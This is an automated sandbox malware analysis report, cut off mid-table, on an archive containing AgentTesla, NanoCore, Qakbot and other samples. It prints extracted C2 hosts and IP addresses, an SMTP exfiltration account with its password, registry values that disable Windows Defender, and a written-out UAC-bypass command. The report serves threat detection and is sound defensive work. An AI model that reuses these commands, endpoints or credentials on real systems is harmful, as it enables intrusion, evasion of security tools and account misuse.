agenttesla | hxxps://samples[.]vx-underground[.]org/Samples/Bazaar%20Collection/Downloadable%20Releases/Bazaar[.]2020[.]04[.]7z

Analysis

max time kernel
1200s
max time network
1204s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
19-05-2024 12:43

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://samples.vx-underground.org/Samples/Bazaar%20Collection/Downloadable%20Releases/Bazaar.2020.04.7z

Score

10^/10

agenttesla hawkeye nanocore qakbot trickbot spx91 1586271924 banker collection dave evasion keylogger persistence spyware stealer trojan upx

Malware Config

Extracted

Credentials

Protocol: smtp
Host:
smtp.yandex.com
Port:
587
Username:
[email protected]
Password:
ikechukwu112

Extracted

Family

nanocore

Version

1.2.2.0

wae54.duckdns.org:40000

wave54.duckdns.org:40000

Mutex

dc04a2f6-b691-4363-9339-ed427ef95e06

Attributes

activate_away_mode
true
backup_connection_host
wave54.duckdns.org
backup_dns_server
8.8.4.4
buffer_size
65535
build_time
2019-12-29T13:16:21.446284736Z
bypass_user_account_control
false
bypass_user_account_control_data
PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTE2Ij8+DQo8VGFzayB2ZXJzaW9uPSIxLjIiIHhtbG5zPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dpbmRvd3MvMjAwNC8wMi9taXQvdGFzayI+DQogIDxSZWdpc3RyYXRpb25JbmZvIC8+DQogIDxUcmlnZ2VycyAvPg0KICA8UHJpbmNpcGFscz4NCiAgICA8UHJpbmNpcGFsIGlkPSJBdXRob3IiPg0KICAgICAgPExvZ29uVHlwZT5JbnRlcmFjdGl2ZVRva2VuPC9Mb2dvblR5cGU+DQogICAgICA8UnVuTGV2ZWw+SGlnaGVzdEF2YWlsYWJsZTwvUnVuTGV2ZWw+DQogICAgPC9QcmluY2lwYWw+DQogIDwvUHJpbmNpcGFscz4NCiAgPFNldHRpbmdzPg0KICAgIDxNdWx0aXBsZUluc3RhbmNlc1BvbGljeT5QYXJhbGxlbDwvTXVsdGlwbGVJbnN0YW5jZXNQb2xpY3k+DQogICAgPERpc2FsbG93U3RhcnRJZk9uQmF0dGVyaWVzPmZhbHNlPC9EaXNhbGxvd1N0YXJ0SWZPbkJhdHRlcmllcz4NCiAgICA8U3RvcElmR29pbmdPbkJhdHRlcmllcz5mYWxzZTwvU3RvcElmR29pbmdPbkJhdHRlcmllcz4NCiAgICA8QWxsb3dIYXJkVGVybWluYXRlPnRydWU8L0FsbG93SGFyZFRlcm1pbmF0ZT4NCiAgICA8U3RhcnRXaGVuQXZhaWxhYmxlPmZhbHNlPC9TdGFydFdoZW5BdmFpbGFibGU+DQogICAgPFJ1bk9ubHlJZk5ldHdvcmtBdmFpbGFibGU+ZmFsc2U8L1J1bk9ubHlJZk5ldHdvcmtBdmFpbGFibGU+DQogICAgPElkbGVTZXR0aW5ncz4NCiAgICAgIDxTdG9wT25JZGxlRW5kPmZhbHNlPC9TdG9wT25JZGxlRW5kPg0KICAgICAgPFJlc3RhcnRPbklkbGU+ZmFsc2U8L1Jlc3RhcnRPbklkbGU+DQogICAgPC9JZGxlU2V0dGluZ3M+DQogICAgPEFsbG93U3RhcnRPbkRlbWFuZD50cnVlPC9BbGxvd1N0YXJ0T25EZW1hbmQ+DQogICAgPEVuYWJsZWQ+dHJ1ZTwvRW5hYmxlZD4NCiAgICA8SGlkZGVuPmZhbHNlPC9IaWRkZW4+DQogICAgPFJ1bk9ubHlJZklkbGU+ZmFsc2U8L1J1bk9ubHlJZklkbGU+DQogICAgPFdha2VUb1J1bj5mYWxzZTwvV2FrZVRvUnVuPg0KICAgIDxFeGVjdXRpb25UaW1lTGltaXQ+UFQwUzwvRXhlY3V0aW9uVGltZUxpbWl0Pg0KICAgIDxQcmlvcml0eT40PC9Qcmlvcml0eT4NCiAgPC9TZXR0aW5ncz4NCiAgPEFjdGlvbnMgQ29udGV4dD0iQXV0aG9yIj4NCiAgICA8RXhlYz4NCiAgICAgIDxDb21tYW5kPiIjRVhFQ1VUQUJMRVBBVEgiPC9Db21tYW5kPg0KICAgICAgPEFyZ3VtZW50cz4kKEFyZzApPC9Bcmd1bWVudHM+DQogICAgPC9FeGVjPg0KICA8L0FjdGlvbnM+DQo8L1Rhc2s+
clear_access_control
true
clear_zone_identifier
false
connect_delay
4000
connection_port
40000
default_group
wave11
enable_debug_mode
true
gc_threshold
1.048576e+07
keep_alive_timeout
30000
keyboard_logging
false
lan_timeout
2500
max_packet_size
1.048576e+07
mutex
dc04a2f6-b691-4363-9339-ed427ef95e06
mutex_timeout
5000
prevent_system_sleep
false
primary_connection_host
wae54.duckdns.org
primary_dns_server
8.8.8.8
request_elevation
true
restart_delay
5000
run_delay
0
run_on_startup
false
set_critical_process
true
timeout_interval
5000
use_custom_dns_server
false
version
1.2.2.0
wan_timeout
8000

Extracted

Family

agenttesla

Credentials

Protocol: smtp
Host:
smtp.yandex.com
Port:
587
Username:
[email protected]
Password:
ikechukwu112

Extracted

Family

qakbot

Version

324.75

Botnet

spx91

Campaign

1586271924

95.77.223.148:443

68.14.210.246:22

151.205.102.42:443

80.11.10.151:990

24.32.119.146:443

173.69.58.179:443

78.96.245.58:443

172.78.87.180:443

173.3.106.172:2222

207.144.193.210:443

47.134.5.231:443

72.142.106.198:465

108.56.213.203:443

172.251.50.199:443

74.109.200.208:443

108.227.161.27:995

98.13.0.128:443

79.113.219.121:443

84.247.55.190:443

80.14.209.42:2222

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla
HawkEye
HawkEye is a malware kit that has seen continuous development since at least 2013.
keylogger trojan stealer spyware hawkeye

Modifies Windows Defender Real-time Protection settings 3 TTPs 10 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

Processes:

reg.exereg.exereg.exereg.exereg.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	reg.exe

NanoCore
NanoCore is a remote access tool (RAT) with a variety of capabilities.
keylogger trojan stealer spyware nanocore
Qakbot/Qbot
Qbot or Qakbot is a sophisticated worm with banking capabilities.
trojan banker stealer qakbot
Trickbot
Developed in 2016, TrickBot is one of the more recent banking Trojans.
trojan banker trickbot

AgentTesla payload 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/3172-327-0x0000000000400000-0x0000000000450000-memory.dmp	family_agenttesla

NirSoft MailPassView 1 IoCs

Password recovery tool for various email clients

Processes:

resource	yara_rule
behavioral1/memory/1940-609-0x0000000005250000-0x00000000052D8000-memory.dmp	MailPassView

NirSoft WebBrowserPassView 1 IoCs

Password recovery tool for various web browsers

Processes:

resource	yara_rule
behavioral1/memory/1940-609-0x0000000005250000-0x00000000052D8000-memory.dmp	WebBrowserPassView

Nirsoft 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/1940-609-0x0000000005250000-0x00000000052D8000-memory.dmp	Nirsoft

Dave packer 1 IoCs

Detects executable using a packer named 'Dave' by the community, based on a string at the end.

dave

Processes:

resource	yara_rule
behavioral1/memory/4016-389-0x0000000002220000-0x0000000002252000-memory.dmp	dave

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WScript.exeExploit.Win32.UAC.fal-593f6f872a3f5c378bc43383cebcf468f3469dedd09e3ad9bd0c3e6ae266549d.tmpWScript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation	Exploit.Win32.UAC.fal-593f6f872a3f5c378bc43383cebcf468f3469dedd09e3ad9bd0c3e6ae266549d.tmp
Key value queried	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation	WScript.exe

Drops startup file 2 IoCs

Processes:

Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exeHEUR-Backdoor.Win32.Androm.gen-425b6f4931518861eddd73d943cf463db97247741677bf96cd6efa61a28400df.exe

description	ioc	process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\autopilot.url	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\30081904L0PR.vbs	HEUR-Backdoor.Win32.Androm.gen-425b6f4931518861eddd73d943cf463db97247741677bf96cd6efa61a28400df.exe

Executes dropped EXE 28 IoCs

Processes:

Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exeExploit.Win32.UAC.fal-593f6f872a3f5c378bc43383cebcf468f3469dedd09e3ad9bd0c3e6ae266549d.exeExploit.Win32.UAC.fal-593f6f872a3f5c378bc43383cebcf468f3469dedd09e3ad9bd0c3e6ae266549d.tmp7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exeMBSetup.exeExploit.Win32.ShadowBrokers.ae-85b936960fbe5100c170b777e1647ce9f0f01e3ab9742dfc23f37cb0825b30b5.exeHEUR-Backdoor.MSIL.NanoBot.gen-8a5f9b060b9ea5ff21a5b1654836935d779ea8868d8f6d49bff50074ddfcf8dd.exeHEUR-Backdoor.MSIL.NanoBot.gen-8a5f9b060b9ea5ff21a5b1654836935d779ea8868d8f6d49bff50074ddfcf8dd.exeHEUR-Backdoor.Win32.Androm.gen-425b6f4931518861eddd73d943cf463db97247741677bf96cd6efa61a28400df.exeHEUR-Backdoor.Win32.Androm.gen-425b6f4931518861eddd73d943cf463db97247741677bf96cd6efa61a28400df.exeGetBP.exeEmailPasswordDump.exeFTPPasswordDump.exeHEUR-Trojan-Banker.Win32.BestaFera.gen-459f47867adaa021b11ba6ac50c1a4784902cf750b917c957abe9e91bd1fb8a0.exeHEUR-Trojan-Banker.Win32.Emotet.gen-9b391545739faad182793dcda22cd76ecac4cd4d796dbb69663e976c1df11c5e.exeHEUR-Trojan-Banker.Win32.Qbot.vho-9c76a29d9349d21165a916b11ded6139a3cc066d3c59880a5b9016d42ea948fd.exeHEUR-Trojan-Dropper.MSIL.Sysn.gen-2d247ddbe562ab9d09de813690eab0dc59ae57f5e6ffae2e95b9828d13dccd14.exe

pid	process
5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
1920	Exploit.Win32.UAC.fal-593f6f872a3f5c378bc43383cebcf468f3469dedd09e3ad9bd0c3e6ae266549d.exe
4920	Exploit.Win32.UAC.fal-593f6f872a3f5c378bc43383cebcf468f3469dedd09e3ad9bd0c3e6ae266549d.tmp
4352	7z.exe
2808	7z.exe
1444	7z.exe
2884	7z.exe
2216	7z.exe
3424	7z.exe
712	7z.exe
3488	7z.exe
3908	7z.exe
1932	7z.exe
1168	7z.exe
2340	7z.exe
4844	MBSetup.exe
1128	Exploit.Win32.ShadowBrokers.ae-85b936960fbe5100c170b777e1647ce9f0f01e3ab9742dfc23f37cb0825b30b5.exe
3948	HEUR-Backdoor.MSIL.NanoBot.gen-8a5f9b060b9ea5ff21a5b1654836935d779ea8868d8f6d49bff50074ddfcf8dd.exe
3172	HEUR-Backdoor.MSIL.NanoBot.gen-8a5f9b060b9ea5ff21a5b1654836935d779ea8868d8f6d49bff50074ddfcf8dd.exe
2968	HEUR-Backdoor.Win32.Androm.gen-425b6f4931518861eddd73d943cf463db97247741677bf96cd6efa61a28400df.exe
2008	HEUR-Backdoor.Win32.Androm.gen-425b6f4931518861eddd73d943cf463db97247741677bf96cd6efa61a28400df.exe
744	GetBP.exe
2328	EmailPasswordDump.exe
4964	FTPPasswordDump.exe
3500	HEUR-Trojan-Banker.Win32.BestaFera.gen-459f47867adaa021b11ba6ac50c1a4784902cf750b917c957abe9e91bd1fb8a0.exe
4016	HEUR-Trojan-Banker.Win32.Emotet.gen-9b391545739faad182793dcda22cd76ecac4cd4d796dbb69663e976c1df11c5e.exe
1868	HEUR-Trojan-Banker.Win32.Qbot.vho-9c76a29d9349d21165a916b11ded6139a3cc066d3c59880a5b9016d42ea948fd.exe
1940	HEUR-Trojan-Dropper.MSIL.Sysn.gen-2d247ddbe562ab9d09de813690eab0dc59ae57f5e6ffae2e95b9828d13dccd14.exe

Loads dropped DLL 12 IoCs

Processes:

7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe

pid process

4352 7z.exe
2808 7z.exe
1444 7z.exe
2884 7z.exe
2216 7z.exe
3424 7z.exe
712 7z.exe
3488 7z.exe
3908 7z.exe
1932 7z.exe
1168 7z.exe
2340 7z.exe
Reads WinSCP keys stored on the system 2 TTPs
Tries to access WinSCP stored sessions.
spyware stealer

Data from Local System
T1005

Credentials in Registry
T1552.002
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

pid	process
4352	7z.exe
2808	7z.exe
1444	7z.exe
2884	7z.exe
2216	7z.exe
3424	7z.exe
712	7z.exe
3488	7z.exe
3908	7z.exe
1932	7z.exe
1168	7z.exe
2340	7z.exe

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral1/memory/2008-334-0x0000000000400000-0x00000000007EA000-memory.dmp	upx
behavioral1/memory/2008-336-0x0000000000400000-0x00000000007EA000-memory.dmp	upx
behavioral1/memory/2008-339-0x0000000000400000-0x00000000007EA000-memory.dmp	upx
behavioral1/memory/2008-335-0x0000000000400000-0x00000000007EA000-memory.dmp	upx

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

Accesses Microsoft Outlook accounts 1 TTPs 2 IoCs

collection

Email Collection

T1114

Processes:

EmailPasswordDump.exevbc.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	EmailPasswordDump.exe
Key opened	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	vbc.exe

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

Processes:

HEUR-Backdoor.MSIL.NanoBot.gen-8a5f9b060b9ea5ff21a5b1654836935d779ea8868d8f6d49bff50074ddfcf8dd.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	HEUR-Backdoor.MSIL.NanoBot.gen-8a5f9b060b9ea5ff21a5b1654836935d779ea8868d8f6d49bff50074ddfcf8dd.exe
Key opened	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	HEUR-Backdoor.MSIL.NanoBot.gen-8a5f9b060b9ea5ff21a5b1654836935d779ea8868d8f6d49bff50074ddfcf8dd.exe
Key opened	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	HEUR-Backdoor.MSIL.NanoBot.gen-8a5f9b060b9ea5ff21a5b1654836935d779ea8868d8f6d49bff50074ddfcf8dd.exe

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

HEUR-Backdoor.Win32.Androm.gen-425b6f4931518861eddd73d943cf463db97247741677bf96cd6efa61a28400df.exeRegAsm.exeRegAsm.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\suck_My_dick = "C:\\Users\\Admin\\AppData\\Local\\Temp\\cae33a0264ead2ddfbc3ea113da66790.exe / start"	HEUR-Backdoor.Win32.Androm.gen-425b6f4931518861eddd73d943cf463db97247741677bf96cd6efa61a28400df.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Update = "C:\\Users\\Admin\\AppData\\Roaming\\WindowsUpdate.exe"	RegAsm.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\SMTP Subsystem = "C:\\Program Files (x86)\\SMTP Subsystem\\smtpss.exe"	RegAsm.exe

Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

RegAsm.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA RegAsm.exe
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

397 whatismyipaddress.com
399 whatismyipaddress.com

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	RegAsm.exe

flow	ioc
397	whatismyipaddress.com
399	whatismyipaddress.com

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

Processes:

resource	yara_rule
C:\Users\Admin\Desktop\Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe	autoit_exe

Suspicious use of SetThreadContext 6 IoCs

Processes:

Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exeHEUR-Backdoor.MSIL.NanoBot.gen-8a5f9b060b9ea5ff21a5b1654836935d779ea8868d8f6d49bff50074ddfcf8dd.exeHEUR-Backdoor.Win32.Androm.gen-425b6f4931518861eddd73d943cf463db97247741677bf96cd6efa61a28400df.exeHEUR-Trojan-Dropper.MSIL.Sysn.gen-2d247ddbe562ab9d09de813690eab0dc59ae57f5e6ffae2e95b9828d13dccd14.exeRegAsm.exe

description	pid	process	target process
PID 5036 set thread context of 4240	5036	Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe	RegAsm.exe
PID 3948 set thread context of 3172	3948	HEUR-Backdoor.MSIL.NanoBot.gen-8a5f9b060b9ea5ff21a5b1654836935d779ea8868d8f6d49bff50074ddfcf8dd.exe	HEUR-Backdoor.MSIL.NanoBot.gen-8a5f9b060b9ea5ff21a5b1654836935d779ea8868d8f6d49bff50074ddfcf8dd.exe
PID 2968 set thread context of 2008	2968	HEUR-Backdoor.Win32.Androm.gen-425b6f4931518861eddd73d943cf463db97247741677bf96cd6efa61a28400df.exe	HEUR-Backdoor.Win32.Androm.gen-425b6f4931518861eddd73d943cf463db97247741677bf96cd6efa61a28400df.exe
PID 1940 set thread context of 3416	1940	HEUR-Trojan-Dropper.MSIL.Sysn.gen-2d247ddbe562ab9d09de813690eab0dc59ae57f5e6ffae2e95b9828d13dccd14.exe	RegAsm.exe
PID 3416 set thread context of 4596	3416	RegAsm.exe	vbc.exe
PID 3416 set thread context of 2724	3416	RegAsm.exe	vbc.exe

Drops file in Program Files directory 3 IoCs

Processes:

RegAsm.exeExploit.Win32.UAC.fal-593f6f872a3f5c378bc43383cebcf468f3469dedd09e3ad9bd0c3e6ae266549d.tmp

description	ioc	process
File created	C:\Program Files (x86)\SMTP Subsystem\smtpss.exe	RegAsm.exe
File opened for modification	C:\Program Files (x86)\SMTP Subsystem\smtpss.exe	RegAsm.exe
File created	C:\Program Files (x86)\WindowsPowerShell\Configuration\is-G0H28.tmp	Exploit.Win32.UAC.fal-593f6f872a3f5c378bc43383cebcf468f3469dedd09e3ad9bd0c3e6ae266549d.tmp

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

Processes:

WerFault.exe

pid	pid_target	process	target process
2500	1868	WerFault.exe	HEUR-Trojan-Banker.Win32.Qbot.vho-9c76a29d9349d21165a916b11ded6139a3cc066d3c59880a5b9016d42ea948fd.exe

Checks processor information in registry 2 TTPs 6 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

dw20.exeWINWORD.EXE

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	dw20.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	dw20.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	dw20.exe

Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exeschtasks.exe

pid process

2496 schtasks.exe
4068 schtasks.exe

pid	process
2496	schtasks.exe
4068	schtasks.exe

Enumerates system info in registry 2 TTPs 8 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exeWINWORD.EXEdw20.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	dw20.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	dw20.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe

Modifies registry class 9 IoCs

Processes:

reg.exemsedge.exeExploit.Win32.UAC.fal-593f6f872a3f5c378bc43383cebcf468f3469dedd09e3ad9bd0c3e6ae266549d.tmpreg.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\ms-settings\shell\open\command\DelegateExecute = " "	reg.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3808065738-1666277613-1125846146-1000\{022E942D-5595-4500-ABDC-58268448F105}	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings	Exploit.Win32.UAC.fal-593f6f872a3f5c378bc43383cebcf468f3469dedd09e3ad9bd0c3e6ae266549d.tmp
Key created	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\ms-settings\shell	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\ms-settings\shell\open	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\ms-settings\shell\open\command\ = "C:\\windows\\SysWow64\\cmd.exe /c REG ADD HKLM\\software\\microsoft\\windows\\currentversion\\policies\\system /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\ms-settings\shell\open\command	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\ms-settings\shell\open\command	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\ms-settings	reg.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

3528 PING.EXE
Suspicious behavior: AddClipboardFormatListener 2 IoCs

Processes:

WINWORD.EXE

pid process

1980 WINWORD.EXE
1980 WINWORD.EXE

pid	process
3528	PING.EXE

pid	process
1980	WINWORD.EXE
1980	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

msedge.exeRegAsm.exemsedge.exeExploit.Win32.UAC.fal-593f6f872a3f5c378bc43383cebcf468f3469dedd09e3ad9bd0c3e6ae266549d.tmp

pid	process
1872	msedge.exe
1872	msedge.exe
4240	RegAsm.exe
4240	RegAsm.exe
4240	RegAsm.exe
416	msedge.exe
416	msedge.exe
4240	RegAsm.exe
4240	RegAsm.exe
4240	RegAsm.exe
4240	RegAsm.exe
4240	RegAsm.exe
4240	RegAsm.exe
4240	RegAsm.exe
4240	RegAsm.exe
4240	RegAsm.exe
4240	RegAsm.exe
4240	RegAsm.exe
4240	RegAsm.exe
4240	RegAsm.exe
4240	RegAsm.exe
4240	RegAsm.exe
4240	RegAsm.exe
4240	RegAsm.exe
4240	RegAsm.exe
4240	RegAsm.exe
4240	RegAsm.exe
4240	RegAsm.exe
4240	RegAsm.exe
4240	RegAsm.exe
4240	RegAsm.exe
4920	Exploit.Win32.UAC.fal-593f6f872a3f5c378bc43383cebcf468f3469dedd09e3ad9bd0c3e6ae266549d.tmp
4920	Exploit.Win32.UAC.fal-593f6f872a3f5c378bc43383cebcf468f3469dedd09e3ad9bd0c3e6ae266549d.tmp
4240	RegAsm.exe
4240	RegAsm.exe
4240	RegAsm.exe
4240	RegAsm.exe
4240	RegAsm.exe
4240	RegAsm.exe
4240	RegAsm.exe
4240	RegAsm.exe
4240	RegAsm.exe
4240	RegAsm.exe
4240	RegAsm.exe
4240	RegAsm.exe
4240	RegAsm.exe
4240	RegAsm.exe
4240	RegAsm.exe
4240	RegAsm.exe
4240	RegAsm.exe
4240	RegAsm.exe
4240	RegAsm.exe
4240	RegAsm.exe
4240	RegAsm.exe
4240	RegAsm.exe
4240	RegAsm.exe
4240	RegAsm.exe
4240	RegAsm.exe
4240	RegAsm.exe
4240	RegAsm.exe
4240	RegAsm.exe
4240	RegAsm.exe
4240	RegAsm.exe
4240	RegAsm.exe

Suspicious behavior: GetForegroundWindowSpam 3 IoCs

Processes:

7zFM.exeRegAsm.exeHEUR-Trojan-Banker.Win32.BestaFera.gen-459f47867adaa021b11ba6ac50c1a4784902cf750b917c957abe9e91bd1fb8a0.exe

pid process

4348 7zFM.exe
4240 RegAsm.exe
3500 HEUR-Trojan-Banker.Win32.BestaFera.gen-459f47867adaa021b11ba6ac50c1a4784902cf750b917c957abe9e91bd1fb8a0.exe

Suspicious behavior: MapViewOfSection 4 IoCs

Processes:

Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exeHEUR-Backdoor.Win32.Androm.gen-425b6f4931518861eddd73d943cf463db97247741677bf96cd6efa61a28400df.exe

pid	process
